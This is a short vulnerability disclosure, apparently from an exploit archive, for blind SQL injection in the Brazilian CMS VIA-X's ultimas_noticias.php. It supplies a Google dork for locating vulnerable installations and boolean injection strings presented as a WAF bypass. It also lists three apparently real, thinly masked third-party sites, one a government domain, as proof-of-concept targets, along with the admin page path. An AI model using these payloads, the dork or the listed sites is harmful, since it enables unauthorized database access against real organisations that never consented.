[+] Blind Sql Injection on CMS VIA-X [+] Date: 23/07/2014 [+] CWE Number : CWE-89 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: http://www.viax.com.br/ [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Linux [+] Vulnerable File: ultimas_noticias.php [+} Dork : inurl:ultimas_noticias.php?codnoticia= [+] Exploit : http://host/ultimas_noticias.php?codnoticia=[BLIND SQL Injection] ps:use "1'+and+1=2--+" and "1'+and+1=1--+" to bypass the waf protection. [+] PoC: http://www.caXmaramuritiba.ba.gov.br/ultimas_noticias.php?codnoticia=37 http://www.vanXdelson.com.br/ultimas_noticias.php?codnoticia=53 http://www.faXt.edu.br/ultimas_noticias.php?codnoticia=797 [+] Admin Page: http://host/admin/